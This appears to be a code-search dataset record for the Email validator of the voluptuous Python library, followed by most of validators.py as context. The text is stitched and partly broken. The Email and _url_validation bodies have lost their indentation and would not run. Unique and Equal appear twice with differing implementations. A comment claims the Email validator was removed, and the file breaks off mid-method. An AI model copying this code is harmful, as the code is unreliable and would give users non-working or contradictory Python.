        except TypeError as e:
            raise TypeInvalid(
                self.msg or 'contains unhashable elements: {0}'.format(e))
        if len(distinct) != len(v):
            # Collect the elements that occur more than once for the message.
            counts = {}
            for item in v:
                counts[item] = counts.get(item, 0) + 1
            dupes = list(set(item for item, n in counts.items() if n > 1))
            raise Invalid(
                self.msg or 'contains duplicate items: {0}'.format(dupes))
        return v

    def __repr__(self):
        return 'Unique()'
class Equal(object):
    """Ensure that value matches target.

    >>> s = Schema(Equal(1))
    >>> s(1)
    1
    >>> with raises(Invalid):
    ...    s(2)

    Validators are not supported, match must be exact:

    >>> s = Schema(Equal(str))
    >>> with raises(Invalid):
    ...     s('foo')
    """

    def __init__(self, target, msg=None):
        self.target = target
        self.msg = msg

    def __call__(self, v):
        """Return *v* if it compares equal to the target."""
        if v != self.target:
            message = self.msg or 'Values are not equal: value:{} != target:{}'.format(v, self.target)
            raise Invalid(message)
        return v

    def __repr__(self):
        return 'Equal({})'.format(self.target)
class Unordered(object):
    """Ensures sequence contains values in unspecified order.

    >>> s = Schema(Unordered([2, 1]))
    >>> s([2, 1])
    [2, 1]
    >>> s([1, 2])
    [1, 2]
    >>> s = Schema(Unordered([str, int]))
    >>> s(['foo', 1])
    ['foo', 1]
    >>> s([1, 'foo'])
    [1, 'foo']
    """

    def __init__(self, validators, msg=None, **kwargs):
        self.validators = validators
        self.msg = msg
        # Pre-compile one Schema per validator.
        self._schemas = [Schema(val, **kwargs) for val in validators]

    def __call__(self, v):
        if not isinstance(v, (list, tuple)):
            raise Invalid(self.msg or 'Value {} is not sequence!'.format(v))
        if len(v) != len(self._schemas):
            raise Invalid(self.msg or 'List lengths differ, value:{} != target:{}'.format(len(v), len(self._schemas)))
        # Greedy matching: each element consumes the first still-unused
        # schema that accepts it.
        consumed = set()
        missing = []
        for index, value in enumerate(v):
            found = False
            for i, s in enumerate(self._schemas):
                if i in consumed:
                    continue
                try:
                    s(value)
                except Invalid:
                    pass
                else:
                    found = True
                    consumed.add(i)
                    break
            if not found:
                missing.append((index, value))
        if len(missing) == 1:
            el = missing[0]
            raise Invalid(self.msg or 'Element #{} ({}) is not valid against any validator'.format(el[0], el[1]))
        elif missing:
            raise MultipleInvalid([Invalid(self.msg or 'Element #{} ({}) is not valid against any validator'.format(
                el[0], el[1])) for el in missing])
        return v

    def __repr__(self):
        return 'Unordered([{}])'.format(", ".join(repr(v) for v in self.validators))
class Number(object):
    """
    Verify the number of digits that are present in the number(Precision),
    and the decimal places(Scale)
    :raises Invalid: If the value does not match the provided Precision and Scale.
    >>> schema = Schema(Number(precision=6, scale=2))
    >>> schema('1234.01')
    '1234.01'
    >>> schema = Schema(Number(precision=6, scale=2, yield_decimal=True))
    >>> schema('1234.01')
    Decimal('1234.01')
    """
    def __init__(self, precision=None, scale=None, msg=None, yield_decimal=False):
        self.precision = precision
        self.scale = scale
        self.msg = msg
        # When True, __call__ returns the parsed Decimal instead of the
        # raw input value.
        self.yield_decimal = yield_decimal
    def __call__(self, v):
        """
        :param v: is a number enclosed with string
        :return: Decimal number
        """
        precision, scale, decimal_num = self._get_precision_scale(v)
        # The combined error is raised only when BOTH configured limits
        # mismatch; otherwise each limit is reported individually below.
        if self.precision is not None and self.scale is not None and precision != self.precision\
                and scale != self.scale:
            raise Invalid(self.msg or "Precision must be equal to %s, and Scale must be equal to %s" % (self.precision,
                                                                                                        self.scale))
        else:
            if self.precision is not None and precision != self.precision:
                raise Invalid(self.msg or "Precision must be equal to %s" % self.precision)
            if self.scale is not None and scale != self.scale:
                raise Invalid(self.msg or "Scale must be equal to %s" % self.scale)
            if self.yield_decimal:
                return decimal_num
            else:
                return v
    def __repr__(self):
        return ('Number(precision=%s, scale=%s, msg=%s)' % (self.precision, self.scale, self.msg))
    def _get_precision_scale(self, number):
        """
        :param number:
        :return: tuple(precision, scale, decimal_number)
        """
        try:
            decimal_num = Decimal(number)
        except InvalidOperation:
            raise Invalid(self.msg or 'Value must be a number enclosed with string')
        # precision = total digit count of the Decimal; scale = -(exponent),
        # i.e. the number of digits to the right of the decimal point.
        return (len(decimal_num.as_tuple().digits), -(decimal_num.as_tuple().exponent), decimal_num)
class SomeOf(_WithSubValidators):
    """Value must pass at least some validations, determined by the given parameter.
    Optionally, number of passed validations can be capped.
    The output of each validator is passed as input to the next.
    :param min_valid: Minimum number of valid schemas.
    :param validators: a list of schemas or validators to match input against
    :param max_valid: Maximum number of valid schemas.
    :param msg: Message to deliver to user if validation fails.
    :param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
    :raises NotEnoughValid: if the minimum number of validations isn't met
    :raises TooManyValid: if the more validations than the given amount is met
    >>> validate = Schema(SomeOf(min_valid=2, validators=[Range(1, 5), Any(float, int), 6.6]))
    >>> validate(6.6)
    6.6
    >>> validate(3)
    3
    >>> with raises(MultipleInvalid, 'value must be at most 5, not a valid value'):
    ...     validate(6.2)
    """
    def __init__(self, validators, min_valid=None, max_valid=None, **kwargs):
        assert min_valid is not None or max_valid is not None, \
            'when using "%s" you should specify at least one of min_valid and max_valid' % (type(self).__name__,)
        # Unspecified bounds default to the loosest possible constraint.
        self.min_valid = min_valid or 0
        self.max_valid = max_valid or len(validators)
        super(SomeOf, self).__init__(*validators, **kwargs)
    def _exec(self, funcs, v, path=None):
        errors = []
        funcs = list(funcs)
        # Run EVERY validator; each success threads its output into ``v``.
        for func in funcs:
            try:
                if path is None:
                    v = func(v)
                else:
                    v = func(path, v)
            except Invalid as e:
                errors.append(e)
        passed_count = len(funcs) - len(errors)
        if self.min_valid <= passed_count <= self.max_valid:
            return v
        msg = self.msg
        if not msg:
            msg = ', '.join(map(str, errors))
        if passed_count > self.max_valid:
            raise TooManyValid(msg)
        raise NotEnoughValid(msg)
    def __repr__(self):
        return 'SomeOf(min_valid=%s, validators=[%s], max_valid=%s, msg=%r)' % (
            self.min_valid, ", ".join(repr(v) for v in self.validators), self.max_valid, self.msg)
|
alecthomas/voluptuous | voluptuous/validators.py | Email | python | def Email(v):
try:
if not v or "@" not in v:
raise EmailInvalid("Invalid Email")
user_part, domain_part = v.rsplit('@', 1)
if not (USER_REGEX.match(user_part) and DOMAIN_REGEX.match(domain_part)):
raise EmailInvalid("Invalid Email")
return v
except:
raise ValueError | Verify that the value is an Email or not.
>>> s = Schema(Email())
>>> with raises(MultipleInvalid, 'expected an Email'):
... s("a.com")
>>> with raises(MultipleInvalid, 'expected an Email'):
... s("a@.com")
>>> with raises(MultipleInvalid, 'expected an Email'):
... s("a@.com")
>>> s('t@x.com')
't@x.com' | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/validators.py#L366-L388 | null | import os
import re
import datetime
import sys
from functools import wraps
from decimal import Decimal, InvalidOperation
from voluptuous.schema_builder import Schema, raises, message
from voluptuous.error import (MultipleInvalid, CoerceInvalid, TrueInvalid, FalseInvalid, BooleanInvalid, Invalid,
AnyInvalid, AllInvalid, MatchInvalid, UrlInvalid, EmailInvalid, FileInvalid, DirInvalid,
RangeInvalid, PathInvalid, ExactSequenceInvalid, LengthInvalid, DatetimeInvalid,
DateInvalid, InInvalid, TypeInvalid, NotInInvalid, ContainsInvalid, NotEnoughValid,
TooManyValid)
if sys.version_info >= (3,):
import urllib.parse as urlparse
basestring = str
else:
import urlparse
# Taken from https://github.com/kvesteri/validators/blob/master/validators/email.py
# Matches the local (user) part of an email address: either a dot-atom or a
# quoted-string form.
USER_REGEX = re.compile(
    # dot-atom
    r"(^[-!#$%&'*+/=?^_`{}|~0-9A-Z]+"
    r"(\.[-!#$%&'*+/=?^_`{}|~0-9A-Z]+)*$"
    # quoted-string
    r'|^"([\001-\010\013\014\016-\037!#-\[\]-\177]|'
    r"""\\[\001-\011\013\014\016-\177])*"$)""",
    re.IGNORECASE
)
# Matches the domain part: a dotted hostname, or a bracketed IPv4 literal.
DOMAIN_REGEX = re.compile(
    # domain
    r'(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+'
    r'(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?$)'
    # literal form, ipv4 address (SMTP 4.1.3)
    r'|^\[(25[0-5]|2[0-4]\d|[0-1]?\d?\d)'
    r'(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\]$',
    re.IGNORECASE)
__author__ = 'tusharmakkar08'
def truth(f):
    """Convenience decorator to convert truth functions into validators.
    >>> @truth
    ... def isdir(v):
    ...     return os.path.isdir(v)
    >>> validate = Schema(isdir)
    >>> validate('/')
    '/'
    >>> with raises(MultipleInvalid, 'not a valid value'):
    ...     validate('/notavaliddir')
    """
    @wraps(f)
    def check(v):
        # A falsy result marks the value invalid; ValueError is the signal
        # the schema machinery converts into an Invalid error.
        if not f(v):
            raise ValueError
        return v
    return check
class Coerce(object):
    """Coerce a value to a type.
    If the type constructor throws a ValueError or TypeError, the value
    will be marked as Invalid.
    Default behavior:
    >>> validate = Schema(Coerce(int))
    >>> with raises(MultipleInvalid, 'expected int'):
    ...     validate(None)
    >>> with raises(MultipleInvalid, 'expected int'):
    ...     validate('foo')
    With custom message:
    >>> validate = Schema(Coerce(int, "moo"))
    >>> with raises(MultipleInvalid, 'moo'):
    ...     validate('foo')
    """
    def __init__(self, type, msg=None):
        # ``type`` may be any unary callable, e.g. ``int`` or ``Decimal``.
        self.type = type
        self.msg = msg
        self.type_name = type.__name__
    def __call__(self, v):
        try:
            return self.type(v)
        except (ValueError, TypeError, InvalidOperation):
            # Conversion failed; report the target type (or custom message).
            raise CoerceInvalid(self.msg or ('expected %s' % self.type_name))
    def __repr__(self):
        return 'Coerce(%s, msg=%r)' % (self.type_name, self.msg)
@message('value was not true', cls=TrueInvalid)
@truth
def IsTrue(v):
    """Assert that a value is true, in the Python sense.
    >>> validate = Schema(IsTrue())
    "In the Python sense" means that implicitly false values, such as empty
    lists, dictionaries, etc. are treated as "false":
    >>> with raises(MultipleInvalid, "value was not true"):
    ...     validate([])
    >>> validate([1])
    [1]
    >>> with raises(MultipleInvalid, "value was not true"):
    ...     validate(False)
    ...and so on.
    >>> try:
    ...     validate([])
    ... except MultipleInvalid as e:
    ...     assert isinstance(e.errors[0], TrueInvalid)
    """
    # @truth rejects falsy values before we get here; just echo v through.
    return v
@message('value was not false', cls=FalseInvalid)
def IsFalse(v):
    """Assert that a value is false, in the Python sense.
    (see :func:`IsTrue` for more detail)
    >>> validate = Schema(IsFalse())
    >>> validate([])
    []
    >>> with raises(MultipleInvalid, "value was not false"):
    ...     validate(True)
    >>> try:
    ...     validate(True)
    ... except MultipleInvalid as e:
    ...     assert isinstance(e.errors[0], FalseInvalid)
    """
    # A truthy value is invalid; ValueError is translated by @message.
    if v:
        raise ValueError
    return v
@message('expected boolean', cls=BooleanInvalid)
def Boolean(v):
    """Convert human-readable boolean values to a bool.
    Accepted values are 1, true, yes, on, enable, and their negatives.
    Non-string values are cast to bool.
    >>> validate = Schema(Boolean())
    >>> validate(True)
    True
    >>> validate("1")
    True
    >>> validate("0")
    False
    >>> with raises(MultipleInvalid, "expected boolean"):
    ...     validate('moo')
    >>> try:
    ...     validate('moo')
    ... except MultipleInvalid as e:
    ...     assert isinstance(e.errors[0], BooleanInvalid)
    """
    if isinstance(v, basestring):
        lowered = v.lower()
        if lowered in ('1', 'true', 'yes', 'on', 'enable'):
            return True
        if lowered in ('0', 'false', 'no', 'off', 'disable'):
            return False
        # Unrecognised string: invalid; @message turns this into an error.
        raise ValueError
    return bool(v)
class _WithSubValidators(object):
    """Base class for validators that use sub-validators.
    Special class to use as a parent class for validators using sub-validators.
    This class provides the `__voluptuous_compile__` method so the
    sub-validators are compiled by the parent `Schema`.
    Subclasses must implement ``_exec(funcs, v, path=None)``.
    """
    def __init__(self, *validators, **kwargs):
        self.validators = validators
        self.msg = kwargs.pop('msg', None)
        self.required = kwargs.pop('required', False)
    def __voluptuous_compile__(self, schema):
        self._compiled = []
        for v in self.validators:
            # NOTE: mutates the parent schema's ``required`` flag before
            # compiling each sub-validator so they inherit this setting.
            schema.required = self.required
            self._compiled.append(schema._compile(v))
        return self._run
    def _run(self, path, value):
        return self._exec(self._compiled, value, path)
    def __call__(self, v):
        # Standalone use (outside a parent Schema): wrap each validator in a
        # fresh Schema lazily, on every call.
        return self._exec((Schema(val) for val in self.validators), v)
    def __repr__(self):
        return '%s(%s, msg=%r)' % (
            self.__class__.__name__,
            ", ".join(repr(v) for v in self.validators),
            self.msg
        )
class Any(_WithSubValidators):
    """Use the first validated value.
    :param msg: Message to deliver to user if validation fails.
    :param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
    :returns: Return value of the first validator that passes.
    >>> validate = Schema(Any('true', 'false',
    ...                       All(Any(int, bool), Coerce(bool))))
    >>> validate('true')
    'true'
    >>> validate(1)
    True
    >>> with raises(MultipleInvalid, "not a valid value"):
    ...     validate('moo')
    msg argument is used
    >>> validate = Schema(Any(1, 2, 3, msg="Expected 1 2 or 3"))
    >>> validate(1)
    1
    >>> with raises(MultipleInvalid, "Expected 1 2 or 3"):
    ...     validate(4)
    """
    def _exec(self, funcs, v, path=None):
        error = None
        for func in funcs:
            try:
                if path is None:
                    return func(v)
                else:
                    return func(path, v)
            except Invalid as e:
                # Remember the most specific failure: the error whose path
                # reaches deepest into the value.
                if error is None or len(e.path) > len(error.path):
                    error = e
        else:
            # Loop ran to completion: no validator accepted the value.
            if error:
                raise error if self.msg is None else AnyInvalid(
                    self.msg, path=path)
            raise AnyInvalid(self.msg or 'no valid value found',
                             path=path)
# Convenience alias so schemas can read ``Or(...)`` instead of ``Any(...)``.
Or = Any
class All(_WithSubValidators):
    """Value must pass all validators.
    The output of each validator is passed as input to the next.
    :param msg: Message to deliver to user if validation fails.
    :param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
    >>> validate = Schema(All('10', Coerce(int)))
    >>> validate('10')
    10
    """
    def _exec(self, funcs, v, path=None):
        try:
            # Pipeline: each validator's output becomes the next one's input.
            for func in funcs:
                if path is None:
                    v = func(v)
                else:
                    v = func(path, v)
        except Invalid as e:
            raise e if self.msg is None else AllInvalid(self.msg, path=path)
        return v
# Convenience alias so schemas can read ``And(...)`` instead of ``All(...)``.
And = All
class Match(object):
    """Value must be a string that matches the regular expression.
    >>> validate = Schema(Match(r'^0x[A-F0-9]+$'))
    >>> validate('0x123EF4')
    '0x123EF4'
    >>> with raises(MultipleInvalid, "does not match regular expression"):
    ...     validate('123EF4')
    >>> with raises(MultipleInvalid, 'expected string or buffer'):
    ...     validate(123)
    Pattern may also be a _compiled regular expression:
    >>> validate = Schema(Match(re.compile(r'0x[A-F0-9]+', re.I)))
    >>> validate('0x123ef4')
    '0x123ef4'
    """
    def __init__(self, pattern, msg=None):
        # Accept either a pattern string (compiled here) or a precompiled
        # regular expression object.
        self.pattern = re.compile(pattern) if isinstance(pattern, basestring) else pattern
        self.msg = msg
    def __call__(self, v):
        try:
            matched = self.pattern.match(v)
        except TypeError:
            # Non-string input cannot be matched at all.
            raise MatchInvalid("expected string or buffer")
        if matched:
            return v
        raise MatchInvalid(self.msg or 'does not match regular expression')
    def __repr__(self):
        return 'Match(%r, msg=%r)' % (self.pattern.pattern, self.msg)
class Replace(object):
    """Regex substitution.
    >>> validate = Schema(All(Replace('you', 'I'),
    ...                       Replace('hello', 'goodbye')))
    >>> validate('you say hello')
    'I say goodbye'
    """
    def __init__(self, pattern, substitution, msg=None):
        # A pattern string is compiled once; a precompiled regex is kept as-is.
        self.pattern = re.compile(pattern) if isinstance(pattern, basestring) else pattern
        self.substitution = substitution
        self.msg = msg
    def __call__(self, v):
        # Pure transformation: every match is replaced, nothing is rejected.
        return self.pattern.sub(self.substitution, v)
    def __repr__(self):
        return 'Replace(%r, %r, msg=%r)' % (self.pattern.pattern, self.substitution, self.msg)
def _url_validation(v):
parsed = urlparse.urlparse(v)
if not parsed.scheme or not parsed.netloc:
raise UrlInvalid("must have a URL scheme and host")
return parsed
@message('expected a Fully qualified domain name URL', cls=UrlInvalid)
def FqdnUrl(v):
    """Verify that the value is a Fully qualified domain name URL.
    >>> s = Schema(FqdnUrl())
    >>> with raises(MultipleInvalid, 'expected a Fully qualified domain name URL'):
    ...     s("http://localhost/")
    >>> s('http://w3.org')
    'http://w3.org'
    """
    # Fix 1: removed a stray ``@message('expected an Email', cls=EmailInvalid)``
    # decorator that belonged to the (removed) Email validator, not to FqdnUrl.
    # Fix 2: narrowed the bare ``except:`` — it also trapped BaseException
    # subclasses such as KeyboardInterrupt and SystemExit.
    try:
        parsed_url = _url_validation(v)
        # A fully qualified host must contain at least one dot, which rules
        # out bare hostnames such as "localhost".
        if "." not in parsed_url.netloc:
            raise UrlInvalid("must have a domain name in URL")
        return v
    except Exception:
        # Normalize any parse/validation failure to ValueError so the
        # @message decorator reports it uniformly.
        raise ValueError
@message('expected a URL', cls=UrlInvalid)
def Url(v):
    """Verify that the value is a URL.
    >>> s = Schema(Url())
    >>> with raises(MultipleInvalid, 'expected a URL'):
    ...     s(1)
    >>> s('http://w3.org')
    'http://w3.org'
    """
    try:
        _url_validation(v)
        return v
    except Exception:
        # Fix: was a bare ``except:``, which also trapped BaseException
        # subclasses (KeyboardInterrupt, SystemExit).  Any parse failure is
        # normalized to ValueError so @message reports it uniformly.
        raise ValueError
@message('not a file', cls=FileInvalid)
@truth
def IsFile(v):
    """Verify the file exists.
    >>> os.path.basename(IsFile()(__file__)).startswith('validators.py')
    True
    >>> with raises(FileInvalid, 'not a file'):
    ...     IsFile()("random_filename_goes_here.py")
    >>> with raises(FileInvalid, 'Not a file'):
    ...     IsFile()(None)
    """
    try:
        if v:
            v = str(v)
            # A False result is turned into ValueError by @truth, then into
            # the 'not a file' FileInvalid by @message.
            return os.path.isfile(v)
        else:
            # Falsy input (e.g. None) is rejected directly.
            raise FileInvalid('Not a file')
    except TypeError:
        raise FileInvalid('Not a file')
@message('not a directory', cls=DirInvalid)
@truth
def IsDir(v):
    """Verify the directory exists.
    >>> IsDir()('/')
    '/'
    >>> with raises(DirInvalid, 'Not a directory'):
    ...     IsDir()(None)
    """
    try:
        if v:
            v = str(v)
            # False result -> ValueError via @truth -> DirInvalid via @message.
            return os.path.isdir(v)
        else:
            # Falsy input (e.g. None) is rejected directly.
            raise DirInvalid("Not a directory")
    except TypeError:
        raise DirInvalid("Not a directory")
@message('path does not exist', cls=PathInvalid)
@truth
def PathExists(v):
    """Verify the path exists, regardless of its type.
    >>> os.path.basename(PathExists()(__file__)).startswith('validators.py')
    True
    >>> with raises(Invalid, 'path does not exist'):
    ...     PathExists()("random_filename_goes_here.py")
    >>> with raises(PathInvalid, 'Not a Path'):
    ...     PathExists()(None)
    """
    try:
        if v:
            v = str(v)
            # False result -> ValueError via @truth -> PathInvalid via @message.
            return os.path.exists(v)
        else:
            # Falsy input (e.g. None) is rejected directly.
            raise PathInvalid("Not a Path")
    except TypeError:
        raise PathInvalid("Not a Path")
def Maybe(validator, msg=None):
    """Validate that the object matches given validator or is None.
    :raises Invalid: if the value does not match the given validator and is not
        None
    >>> s = Schema(Maybe(int))
    >>> s(10)
    10
    >>> with raises(Invalid):
    ...     s("string")
    """
    # Implemented as Any(None, validator): None is accepted before the
    # wrapped validator is consulted.
    return Any(None, validator, msg=msg)
class Range(object):
    """Limit a value to a range.
    Either min or max may be omitted.
    Either min or max can be excluded from the range of accepted values.
    :raises Invalid: If the value is outside the range.
    >>> s = Schema(Range(min=1, max=10, min_included=False))
    >>> s(5)
    5
    >>> s(10)
    10
    >>> with raises(MultipleInvalid, 'value must be at most 10'):
    ...     s(20)
    >>> with raises(MultipleInvalid, 'value must be higher than 1'):
    ...     s(1)
    >>> with raises(MultipleInvalid, 'value must be lower than 10'):
    ...     Schema(Range(max=10, max_included=False))(20)
    """
    def __init__(self, min=None, max=None, min_included=True,
                 max_included=True, msg=None):
        self.min = min
        self.max = max
        # *_included flags choose between inclusive (>=, <=) and exclusive
        # (>, <) boundary checks.
        self.min_included = min_included
        self.max_included = max_included
        self.msg = msg
    def __call__(self, v):
        # ``not v >= x`` (rather than ``v < x``) is deliberate: it also
        # rejects values whose comparisons are all False (e.g. NaN).
        if self.min is not None:
            if self.min_included:
                if not v >= self.min:
                    raise RangeInvalid(
                        self.msg or 'value must be at least %s' % self.min)
            elif not v > self.min:
                raise RangeInvalid(
                    self.msg or 'value must be higher than %s' % self.min)
        if self.max is not None:
            if self.max_included:
                if not v <= self.max:
                    raise RangeInvalid(
                        self.msg or 'value must be at most %s' % self.max)
            elif not v < self.max:
                raise RangeInvalid(
                    self.msg or 'value must be lower than %s' % self.max)
        return v
    def __repr__(self):
        return ('Range(min=%r, max=%r, min_included=%r,'
                ' max_included=%r, msg=%r)' % (self.min, self.max,
                                               self.min_included,
                                               self.max_included,
                                               self.msg))
class Clamp(object):
    """Clamp a value to a range.
    Either min or max may be omitted.
    >>> s = Schema(Clamp(min=0, max=1))
    >>> s(0.5)
    0.5
    >>> s(5)
    1
    >>> s(-1)
    0
    """
    def __init__(self, min=None, max=None, msg=None):
        self.min = min
        self.max = max
        self.msg = msg
    def __call__(self, v):
        # Never rejects: out-of-range input is pulled back to the nearest bound.
        bounded = v
        if self.min is not None and bounded < self.min:
            bounded = self.min
        if self.max is not None and bounded > self.max:
            bounded = self.max
        return bounded
    def __repr__(self):
        return 'Clamp(min=%s, max=%s)' % (self.min, self.max)
class Length(object):
    """The length of a value must be in a certain range."""
    def __init__(self, min=None, max=None, msg=None):
        self.min = min
        self.max = max
        self.msg = msg
    def __call__(self, v):
        size = len(v)
        if self.min is not None and size < self.min:
            raise LengthInvalid(
                self.msg or 'length of value must be at least %s' % self.min)
        if self.max is not None and size > self.max:
            raise LengthInvalid(
                self.msg or 'length of value must be at most %s' % self.max)
        return v
    def __repr__(self):
        return 'Length(min=%s, max=%s)' % (self.min, self.max)
class Datetime(object):
    """Validate that the value matches the datetime format."""
    # ISO-8601-style UTC timestamp, e.g. 2020-01-02T03:04:05.000Z
    DEFAULT_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ'
    def __init__(self, format=None, msg=None):
        self.format = format or self.DEFAULT_FORMAT
        self.msg = msg
    def __call__(self, v):
        # strptime raises TypeError for non-strings and ValueError for
        # strings that do not match the format.
        try:
            datetime.datetime.strptime(v, self.format)
        except (TypeError, ValueError):
            pass
        else:
            return v
        raise DatetimeInvalid(
            self.msg or 'value does not match'
            ' expected format %s' % self.format)
    def __repr__(self):
        return 'Datetime(format=%s)' % self.format
class Date(Datetime):
    """Validate that the value matches the date format."""
    # Overrides the parent's timestamp format with a plain ISO date.
    DEFAULT_FORMAT = '%Y-%m-%d'
    def __call__(self, v):
        try:
            datetime.datetime.strptime(v, self.format)
        except (TypeError, ValueError):
            # TypeError: non-string input; ValueError: wrong format.
            raise DateInvalid(
                self.msg or 'value does not match'
                ' expected format %s' % self.format)
        return v
    def __repr__(self):
        return 'Date(format=%s)' % self.format
class In(object):
    """Validate that a value is in a collection."""
    def __init__(self, container, msg=None):
        self.container = container
        self.msg = msg
    def __call__(self, v):
        try:
            absent = v not in self.container
        except TypeError:
            # e.g. an unhashable value tested against a set: treat as absent.
            absent = True
        if absent:
            raise InInvalid(self.msg or 'value is not allowed')
        return v
    def __repr__(self):
        return 'In(%s)' % (self.container,)
class NotIn(object):
    """Validate that a value is not in a collection."""
    def __init__(self, container, msg=None):
        self.container = container
        self.msg = msg
    def __call__(self, v):
        try:
            present = v in self.container
        except TypeError:
            # Membership could not be tested; conservatively reject.
            present = True
        if present:
            raise NotInInvalid(self.msg or 'value is not allowed')
        return v
    def __repr__(self):
        return 'NotIn(%s)' % (self.container,)
class Contains(object):
    """Validate that the given schema element is in the sequence being validated.
    >>> s = Contains(1)
    >>> s([3, 2, 1])
    [3, 2, 1]
    >>> with raises(ContainsInvalid, 'value is not allowed'):
    ...     s([3, 2])
    """
    def __init__(self, item, msg=None):
        self.item = item
        self.msg = msg
    def __call__(self, v):
        try:
            absent = self.item not in v
        except TypeError:
            # ``v`` does not support membership tests; reject it.
            absent = True
        if absent:
            raise ContainsInvalid(self.msg or 'value is not allowed')
        return v
    def __repr__(self):
        return 'Contains(%s)' % (self.item,)
class ExactSequence(object):
    """Matches each element in a sequence against the corresponding element in
    the validators.
    :param msg: Message to deliver to user if validation fails.
    :param kwargs: All other keyword arguments are passed to the sub-Schema
        constructors.
    >>> from voluptuous import Schema, ExactSequence
    >>> validate = Schema(ExactSequence([str, int, list, list]))
    >>> validate(['hourly_report', 10, [], []])
    ['hourly_report', 10, [], []]
    >>> validate(('hourly_report', 10, [], []))
    ('hourly_report', 10, [], [])
    """
    def __init__(self, validators, **kwargs):
        self.validators = validators
        self.msg = kwargs.pop('msg', None)
        # Pre-compile every positional validator into a Schema.
        self._schemas = [Schema(val, **kwargs) for val in validators]
    def __call__(self, v):
        if not isinstance(v, (list, tuple)) or len(v) != len(self._schemas):
            raise ExactSequenceInvalid(self.msg)
        try:
            # Validate pairwise and rebuild with the input's own type, so a
            # list stays a list and a tuple stays a tuple.
            v = type(v)(schema(x) for x, schema in zip(v, self._schemas))
        except Invalid as e:
            raise e if self.msg is None else ExactSequenceInvalid(self.msg)
        return v
    def __repr__(self):
        return 'ExactSequence([%s])' % (", ".join(repr(v)
                                                  for v in self.validators))
class Unique(object):
    """Ensure an iterable does not contain duplicate items.
    Only iterables convertable to a set are supported (native types and
    objects with correct __eq__).
    JSON does not support set, so they need to be presented as arrays.
    Unique allows ensuring that such array does not contain dupes.
    >>> s = Schema(Unique())
    >>> s([])
    []
    >>> s([1, 2])
    [1, 2]
    >>> with raises(Invalid, 'contains duplicate items: [1]'):
    ...     s([1, 1, 2])
    >>> with raises(Invalid, "contains duplicate items: ['one']"):
    ...     s(['one', 'two', 'one'])
    >>> with raises(Invalid, regex="^contains unhashable elements: "):
    ...     s([set([1, 2]), set([3, 4])])
    >>> s('abc')
    'abc'
    >>> with raises(Invalid, regex="^contains duplicate items: "):
    ...     s('aabbc')
    """
    def __init__(self, msg=None):
        # Optional custom error text used instead of the defaults below.
        self.msg = msg
    def __call__(self, v):
        try:
            unique_items = set(v)
        except TypeError as err:
            # Elements are unhashable; surface the original error text.
            raise TypeInvalid(
                self.msg or 'contains unhashable elements: {0}'.format(err))
        if len(unique_items) == len(v):
            return v
        # Collect every element seen more than once.  set.add returns None,
        # so the predicate is True only for repeated elements.
        observed = set()
        dupes = list(set(x for x in v if x in observed or observed.add(x)))
        raise Invalid(
            self.msg or 'contains duplicate items: {0}'.format(dupes))
    def __repr__(self):
        return 'Unique()'
class Equal(object):
    """Ensure that value matches target.
    >>> s = Schema(Equal(1))
    >>> s(1)
    1
    >>> with raises(Invalid):
    ...     s(2)
    Validators are not supported, match must be exact:
    >>> s = Schema(Equal(str))
    >>> with raises(Invalid):
    ...     s('foo')
    """
    def __init__(self, target, msg=None):
        # ``target`` is compared with ``==`` against every validated value.
        self.target = target
        self.msg = msg
    def __call__(self, v):
        if v == self.target:
            return v
        raise Invalid(self.msg or 'Values are not equal: value:{} != target:{}'.format(v, self.target))
    def __repr__(self):
        return 'Equal({})'.format(self.target)
class Unordered(object):
    """Ensures sequence contains values in unspecified order.
    >>> s = Schema(Unordered([2, 1]))
    >>> s([2, 1])
    [2, 1]
    >>> s([1, 2])
    [1, 2]
    >>> s = Schema(Unordered([str, int]))
    >>> s(['foo', 1])
    ['foo', 1]
    >>> s([1, 'foo'])
    [1, 'foo']
    """
    def __init__(self, validators, msg=None, **kwargs):
        self.validators = validators
        self.msg = msg
        # Compile each validator into a Schema once, up front.
        self._schemas = [Schema(val, **kwargs) for val in validators]
    def __call__(self, v):
        if not isinstance(v, (list, tuple)):
            raise Invalid(self.msg or 'Value {} is not sequence!'.format(v))
        if len(v) != len(self._schemas):
            raise Invalid(self.msg or 'List lengths differ, value:{} != target:{}'.format(len(v), len(self._schemas)))
        # Greedy one-to-one matching: each element is paired with the FIRST
        # not-yet-consumed schema that accepts it, so the outcome can depend
        # on the order validators were supplied.
        consumed = set()
        missing = []
        for index, value in enumerate(v):
            found = False
            for i, s in enumerate(self._schemas):
                if i in consumed:
                    continue
                try:
                    s(value)
                except Invalid:
                    pass
                else:
                    found = True
                    consumed.add(i)
                    break
            if not found:
                missing.append((index, value))
        # One unmatched element raises a single Invalid; several raise a
        # MultipleInvalid aggregating one error per element.
        if len(missing) == 1:
            el = missing[0]
            raise Invalid(self.msg or 'Element #{} ({}) is not valid against any validator'.format(el[0], el[1]))
        elif missing:
            raise MultipleInvalid([Invalid(self.msg or 'Element #{} ({}) is not valid against any validator'.format(
                el[0], el[1])) for el in missing])
        return v
    def __repr__(self):
        return 'Unordered([{}])'.format(", ".join(repr(v) for v in self.validators))
class Number(object):
    """
    Verify the number of digits that are present in the number(Precision),
    and the decimal places(Scale)
    :raises Invalid: If the value does not match the provided Precision and Scale.
    >>> schema = Schema(Number(precision=6, scale=2))
    >>> schema('1234.01')
    '1234.01'
    >>> schema = Schema(Number(precision=6, scale=2, yield_decimal=True))
    >>> schema('1234.01')
    Decimal('1234.01')
    """
    def __init__(self, precision=None, scale=None, msg=None, yield_decimal=False):
        self.precision = precision
        self.scale = scale
        self.msg = msg
        # When True, __call__ returns the parsed Decimal instead of the
        # raw input value.
        self.yield_decimal = yield_decimal
    def __call__(self, v):
        """
        :param v: is a number enclosed with string
        :return: Decimal number
        """
        precision, scale, decimal_num = self._get_precision_scale(v)
        # The combined error is raised only when BOTH configured limits
        # mismatch; otherwise each limit is reported individually below.
        if self.precision is not None and self.scale is not None and precision != self.precision\
                and scale != self.scale:
            raise Invalid(self.msg or "Precision must be equal to %s, and Scale must be equal to %s" % (self.precision,
                                                                                                        self.scale))
        else:
            if self.precision is not None and precision != self.precision:
